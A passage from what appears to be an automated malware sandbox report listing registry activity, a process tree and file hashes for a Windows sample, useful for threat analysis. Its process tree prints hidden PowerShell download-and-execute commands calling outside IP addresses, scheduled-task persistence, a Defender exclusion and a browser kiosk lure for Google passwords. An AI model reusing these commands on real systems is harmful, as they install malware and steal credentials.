| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107710101\51a7d2c853.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107440101\cd0ae9eb0c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107670101\cd4e8b5947.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107730101\ef30a65d57.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107680101\9cab6ad180.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language | C:\Users\Admin\AppData\Local\Temp\10107730101\ef30a65d57.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\sugkcx\gvnsf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107680101\9cab6ad180.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107700101\c77bb98cda.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage | C:\Users\Admin\AppData\Local\Temp\10107730101\ef30a65d57.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\10107700101\c77bb98cda.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = (certificate blob omitted) | C:\Users\Admin\AppData\Local\Temp\10107700101\c77bb98cda.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = (certificate blob omitted) | C:\Users\Admin\AppData\Local\Temp\10107700101\c77bb98cda.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe
"C:\Users\Admin\AppData\Local\Temp\06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn zhMA3ma2QWa /tr "mshta C:\Users\Admin\AppData\Local\Temp\eFSASVJL1.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\eFSASVJL1.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn zhMA3ma2QWa /tr "mshta C:\Users\Admin\AppData\Local\Temp\eFSASVJL1.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE
"C:\Users\Admin\AppData\Local\TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe
"C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe"
C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
"C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"
C:\Users\Admin\AppData\Local\Temp\10107440101\cd0ae9eb0c.exe
"C:\Users\Admin\AppData\Local\Temp\10107440101\cd0ae9eb0c.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn 8oFa0maGBGe /tr "mshta C:\Users\Admin\AppData\Local\Temp\Bjuo1Ytnk.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\Bjuo1Ytnk.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn 8oFa0maGBGe /tr "mshta C:\Users\Admin\AppData\Local\Temp\Bjuo1Ytnk.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OJENHEM5RVI5HVW55SXT5KLKS6NV18D1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\TempOJENHEM5RVI5HVW55SXT5KLKS6NV18D1.EXE
"C:\Users\Admin\AppData\Local\TempOJENHEM5RVI5HVW55SXT5KLKS6NV18D1.EXE"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\10107450121\am_no.cmd" "
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Windows\system32\taskeng.exe
taskeng.exe {8387FC48-1B8B-4A2E-A46B-DAA0AB7AE7B3} S-1-5-21-3063565911-2056067323-3330884624-1000:KHBTHJFA\Admin:Interactive:[1]
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\ProgramData\sugkcx\gvnsf.exe
C:\ProgramData\sugkcx\gvnsf.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "f2QhvmaOIYD" /tr "mshta \"C:\Temp\GH8RmsOFg.hta\"" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta "C:\Temp\GH8RmsOFg.hta"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
C:\Users\Admin\AppData\Local\Temp\10107670101\cd4e8b5947.exe
"C:\Users\Admin\AppData\Local\Temp\10107670101\cd4e8b5947.exe"
C:\Users\Admin\AppData\Local\Temp\10107680101\9cab6ad180.exe
"C:\Users\Admin\AppData\Local\Temp\10107680101\9cab6ad180.exe"
C:\Users\Admin\AppData\Local\Temp\10107680101\9cab6ad180.exe
"C:\Users\Admin\AppData\Local\Temp\10107680101\9cab6ad180.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1532 -s 508
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1688 -s 1028
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\10107690101\cb98fa6f53.exe
"C:\Users\Admin\AppData\Local\Temp\10107690101\cb98fa6f53.exe"
C:\Users\Admin\AppData\Local\Temp\10107700101\c77bb98cda.exe
"C:\Users\Admin\AppData\Local\Temp\10107700101\c77bb98cda.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\10107710101\51a7d2c853.exe
"C:\Users\Admin\AppData\Local\Temp\10107710101\51a7d2c853.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2836 -s 1200
C:\Users\Admin\AppData\Local\Temp\10107720101\65ac27f01e.exe
"C:\Users\Admin\AppData\Local\Temp\10107720101\65ac27f01e.exe"
C:\Users\Admin\AppData\Local\Temp\10107730101\ef30a65d57.exe
"C:\Users\Admin\AppData\Local\Temp\10107730101\ef30a65d57.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM firefox.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM chrome.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM msedge.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM opera.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM brave.exe /T
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.0.1343690239\1625897888" -parentBuildID 20221007134813 -prefsHandle 1212 -prefMapHandle 1204 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1c58ad70-77ce-4714-a16d-718e2daf80da} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 1288 110b7858 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.1.694409263\743002394" -parentBuildID 20221007134813 -prefsHandle 1480 -prefMapHandle 1476 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4d366d0d-4de4-478b-ad16-c0a158ce176b} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 1492 e74258 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.2.755936859\1884948793" -childID 1 -isForBrowser -prefsHandle 2056 -prefMapHandle 2052 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 864 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8d284488-94dc-43c2-8703-eef4d499d07a} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 2068 19ea9358 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.3.668382452\2020364546" -childID 2 -isForBrowser -prefsHandle 2912 -prefMapHandle 2908 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 864 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {10ce6ca1-5ffc-4de3-ba77-71250d0d15d8} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 2924 e64858 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.4.957323284\231409263" -childID 3 -isForBrowser -prefsHandle 3804 -prefMapHandle 3812 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 864 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ba4ef1ef-4c74-45c0-aa97-ba1ccee776fd} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 3824 1fccb858 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.5.972541004\640143421" -childID 4 -isForBrowser -prefsHandle 3948 -prefMapHandle 3952 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 864 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0e0004a2-230c-4dfe-8201-712d705526be} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 3940 1fcf4858 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.6.1844910257\749227326" -childID 5 -isForBrowser -prefsHandle 4068 -prefMapHandle 3796 -prefsLen 26432 -prefMapSize 233444 -jsInitHandle 864 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f44240c1-0e27-40ac-b4f5-3507ce3bf15a} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 4056 1fcf2458 tab
C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe
"C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe"
C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe
"C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe"
C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe
"C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7FE9.tmp\7FEA.tmp\7FEB.bat C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 1048
C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe
"C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3420 -s 1204
C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe"
C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3800 -s 504
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 896 -s 1016
C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe
"C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe"
C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe"
C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4072 -s 500
C:\Users\Admin\AppData\Local\Temp\10107810101\SvhQA35.exe
"C:\Users\Admin\AppData\Local\Temp\10107810101\SvhQA35.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_2212_133856897364813000\chromium.exe
C:\Users\Admin\AppData\Local\Temp\10107810101\SvhQA35.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\ipzvs8T3\Anubis.exe""
C:\Users\Admin\AppData\Local\Temp\10107820101\FvbuInU.exe
"C:\Users\Admin\AppData\Local\Temp\10107820101\FvbuInU.exe"
Network
Files
memory/3500-607-0x00000000008F0000-0x0000000000D48000-memory.dmp
memory/3500-608-0x00000000008F0000-0x0000000000D48000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IAE3FJ0M\soft[1]
| MD5 | f49d1aaae28b92052e997480c504aa3b |
| SHA1 | a422f6403847405cee6068f3394bb151d8591fb5 |
| SHA256 | 81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0 |
| SHA512 | 41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773 |
C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe
| MD5 | 2bb133c52b30e2b6b3608fdc5e7d7a22 |
| SHA1 | fcb19512b31d9ece1bbe637fe18f8caf257f0a00 |
| SHA256 | b8e02f2bc0ffb42e8cf28e37a26d8d825f639079bf6d948f8debab6440ee5630 |
| SHA512 | 73229885f8bf4aace4671b819a8487f36acb7878cd309bdf80b998b0a63584f3063364d192b1fc26fa71b9664908fe290a00f6898350c30f40d5f2a2d2efe51f |
memory/2108-637-0x0000000000DA0000-0x000000000125F000-memory.dmp
memory/2408-638-0x0000000000400000-0x0000000000840000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe
| MD5 | 5b3ed060facb9d57d8d0539084686870 |
| SHA1 | 9cae8c44e44605d02902c29519ea4700b4906c76 |
| SHA256 | 7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207 |
| SHA512 | 6733ae1c74c759031fb2de99beb938f94fc77ed8cc3b42b2b1d24a597f9e74eeab5289f801407619485f81fccaa55546344773e9a71b40b1af6b3c767b69e71a |
memory/3928-655-0x000000001B620000-0x000000001B902000-memory.dmp
memory/3928-656-0x0000000001E80000-0x0000000001E88000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\B4440P9RCO6GVIR8HWV3.temp
| MD5 | e14a3a6130eea99fc9d4dab7bc2f8585 |
| SHA1 | 13c5150d1a5b53a0a8fc5f66889f1ff2d051b998 |
| SHA256 | d5c25e590f6d950b06baedbddb412bb6c510d79c31d7b782c92b7b8efff938aa |
| SHA512 | 29e4e0d9766be0ffa5787ff89cef5dfc1fd926f762ac194af5689ec1ea35a730a392aa8031aff8c2e666a9be6647413853d3bae71513ed19d2ffd6e95245c9ff |
memory/4016-663-0x000000001B4F0000-0x000000001B7D2000-memory.dmp
memory/4016-664-0x0000000002070000-0x0000000002078000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 705d4552cb12e4353a7856d4e055653f |
| SHA1 | db37fa7b6e9183bcb9ddb35ab77aa308f504aac0 |
| SHA256 | 44eb8180c62f9c60d2bc76d32fec4e93de8e4b1c11d26cdcdb68f9429e308374 |
